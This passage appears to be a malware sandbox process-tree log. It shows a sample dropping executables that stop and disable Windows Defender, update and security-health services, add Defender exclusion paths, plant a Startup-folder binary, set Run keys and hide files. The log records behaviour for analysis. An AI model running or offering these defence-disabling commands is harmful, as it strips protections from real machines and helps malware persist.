                                                                                            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\cfd2c909-98c0-493c-bc5a-8fe1a101cd42\test.bat"
                                                                                            3⤵
                                                                                              PID:1756
                                                                                              • C:\Windows\system32\sc.exe
                                                                                                sc stop windefend
                                                                                                4⤵
                                                                                                  PID:2100
                                                                                                • C:\Windows\system32\sc.exe
                                                                                                  sc config windefend start= disabled
                                                                                                  4⤵
                                                                                                    PID:3112
                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                    sc stop Sense
                                                                                                    4⤵
                                                                                                      PID:4276
                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                      sc config Sense start= disabled
                                                                                                      4⤵
                                                                                                        PID:3736
                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                        sc stop wuauserv
                                                                                                        4⤵
                                                                                                          PID:1424
                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                          sc config wuauserv start= disabled
                                                                                                          4⤵
                                                                                                            PID:5104
                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                            sc stop usosvc
                                                                                                            4⤵
                                                                                                              PID:1284
                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                              sc config usosvc start= disabled
                                                                                                              4⤵
                                                                                                                PID:1532
                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                sc stop WaasMedicSvc
                                                                                                                4⤵
                                                                                                                  PID:4292
                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                  sc config WaasMedicSvc start= disabled
                                                                                                                  4⤵
                                                                                                                    PID:4936
                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                    sc stop SecurityHealthService
                                                                                                                    4⤵
                                                                                                                      PID:2348
                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                      sc config SecurityHealthService start= disabled
                                                                                                                      4⤵
                                                                                                                        PID:4992
                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                        sc stop SDRSVC
                                                                                                                        4⤵
                                                                                                                          PID:4916
                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                          sc config SDRSVC start= disabled
                                                                                                                          4⤵
                                                                                                                            PID:2592
                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                            sc stop wscsvc
                                                                                                                            4⤵
                                                                                                                              PID:1964
                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                              sc config wscsvc start= disabled
                                                                                                                              4⤵
                                                                                                                                PID:1408
                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                sc stop WdiServiceHost
                                                                                                                                4⤵
                                                                                                                                  PID:2140
                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                  sc config WdiServiceHost start= disabled
                                                                                                                                  4⤵
                                                                                                                                    PID:2852
                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                    sc stop WdiSystemHost
                                                                                                                                    4⤵
                                                                                                                                      PID:1596
                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                      sc config WdiSystemHost start= disabled
                                                                                                                                      4⤵
                                                                                                                                        PID:1884
                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                        sc stop InstallService
                                                                                                                                        4⤵
                                                                                                                                          PID:1924
                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                          sc config InstallService Start= disabled
                                                                                                                                          4⤵
                                                                                                                                            PID:4740
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\6b26555d-8952-4155-b481-9b91a98f9eed\AdvancedRun.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\6b26555d-8952-4155-b481-9b91a98f9eed\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\6b26555d-8952-4155-b481-9b91a98f9eed\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                                                        2⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:3368
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\6b26555d-8952-4155-b481-9b91a98f9eed\test.bat"
                                                                                                                                          3⤵
                                                                                                                                            PID:3896
                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                              sc stop windefend
                                                                                                                                              4⤵
                                                                                                                                                PID:4116
                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                sc config windefend start= disabled
                                                                                                                                                4⤵
                                                                                                                                                  PID:5112
                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                  sc stop Sense
                                                                                                                                                  4⤵
                                                                                                                                                    PID:3572
                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                    sc config Sense start= disabled
                                                                                                                                                    4⤵
                                                                                                                                                      PID:3136
                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                      sc stop wuauserv
                                                                                                                                                      4⤵
                                                                                                                                                        PID:1596
                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                        sc config wuauserv start= disabled
                                                                                                                                                        4⤵
                                                                                                                                                        • Modifies WinLogon for persistence
                                                                                                                                                        PID:2044
                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                        sc stop usosvc
                                                                                                                                                        4⤵
                                                                                                                                                          PID:1208
                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                          sc config usosvc start= disabled
                                                                                                                                                          4⤵
                                                                                                                                                            PID:3048
                                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                                            sc stop WaasMedicSvc
                                                                                                                                                            4⤵
                                                                                                                                                              PID:4672
                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                              sc config WaasMedicSvc start= disabled
                                                                                                                                                              4⤵
                                                                                                                                                                PID:4632
                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                sc stop SecurityHealthService
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:5028
                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                  sc config SecurityHealthService start= disabled
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:3376
                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                    sc stop SDRSVC
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:4332
                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                      sc config SDRSVC start= disabled
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:3660
                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                        sc stop wscsvc
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:488
                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                          sc config wscsvc start= disabled
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:1428
                                                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                                                            sc stop WdiServiceHost
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:4792
                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                              sc config WdiServiceHost start= disabled
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:1464
                                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                                sc stop WdiSystemHost
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:1088
                                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                                  sc config WdiSystemHost start= disabled
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:4856
                                                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                                                    sc stop InstallService
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:4104
                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                      sc config InstallService Start= disabled
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:3724
                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\FEA6.exe" -Force
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:1516
                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:1088
                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\FEA6.exe" -Force
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:3136
                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:4276
                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\FEA6.exe" -Force
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:4044
                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:2200
                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:3896
                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:2272
                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:1756
                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\FEA6.exe" -Force
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:1628
                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:4120
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                          • System policy modification
                                                                                                                                                                                                          PID:2468
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\40a594fa-b69f-49c3-a305-3c8fb723176d\AdvancedRun.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\40a594fa-b69f-49c3-a305-3c8fb723176d\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\40a594fa-b69f-49c3-a305-3c8fb723176d\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            PID:5628
                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\40a594fa-b69f-49c3-a305-3c8fb723176d\test.bat"
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:5924
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\0fb43cf6-8166-4a3f-bf81-3a75fe3aaa37\AdvancedRun.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\0fb43cf6-8166-4a3f-bf81-3a75fe3aaa37\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\0fb43cf6-8166-4a3f-bf81-3a75fe3aaa37\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:5588
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:5796
                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    PID:5588
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:6120
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\veejays\svchost.exe" -Force
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:5396
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:1552
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:5972
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\veejays\svchost.exe" -Force
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:2588
                                                                                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                                                                                                                                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:6716
                                                                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe
                                                                                                                                                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe"
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:6272
                                                                                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInUtil.exe
                                                                                                                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInUtil.exe"
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:3732
                                                                                                                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:6440
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\veejays\svchost.exe" -Force
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:4792
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\FEA6.exe" -Force
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:5100
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\veejays\svchost.exe" -Force
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:2404
                                                                                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:5744
                                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                                        PID:3676
                                                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:4632
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\D8C.exe
                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\D8C.exe
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          PID:4916
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 464
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                            PID:1308
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 472
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                                                                                            PID:420
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4916 -ip 4916
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                          PID:1428
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4916 -ip 4916
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                          PID:1648
                                                                                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                          C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:2100
                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\0fb43cf6-8166-4a3f-bf81-3a75fe3aaa37\test.bat"
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:5844
                                                                                                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                sc stop windefend
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:5220
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\5081.exe
                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\5081.exe
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                PID:5632
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5632 -s 464
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                                                                                                  PID:5204
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5632 -s 472
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                                                                                                  PID:6692
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5632 -ip 5632
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:3256
                                                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:5828
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 196 -p 5632 -ip 5632
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                    PID:6316
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7B3C.exe
                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7B3C.exe
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                    PID:6228
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6228 -s 272
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                                                                      PID:1196
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 6228 -ip 6228
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                    PID:1936
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\E2E0.exe
                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\E2E0.exe
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                    PID:2136
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\b1.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\b1.exe"
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                                                                                                      PID:4348
                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                        cmd /Q /C move /Y C:\Users\Admin\AppData\Local\Temp\b1.exe C:\Users\Admin\AppData\Roaming\Microsoft\AppServices.exe
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:3092
                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                          cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp"
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:7036
                                                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                PID:7752
                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                              cmd /Q /C reg add "HKCU\Software\Microsoft Partners" /f
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:8064
                                                                                                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                                                                                                  reg add "HKCU\Software\Microsoft Partners" /f
                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                    PID:5824
                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                  cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Microsoft"
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:7852
                                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                      powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Microsoft
                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                                                                                      PID:868
                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                    cmd /C "attrib +S +H C:\Users\Admin\AppData\Roaming\Microsoft\AppServices.exe"
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:7928
                                                                                                                                                                                                                                                                      • C:\Windows\system32\attrib.exe
                                                                                                                                                                                                                                                                        attrib +S +H C:\Users\Admin\AppData\Roaming\Microsoft\AppServices.exe
                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                                                                                                                                        PID:4836
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\test1.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\test1.exe"
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                    PID:4408
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4408 -s 8
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                      PID:868
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\clean.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\clean.exe"
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                    PID:480
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4408 -ip 4408
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                  PID:5400
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4032 -ip 4032
                                                                                                                                                                                                                                                                  1⤵
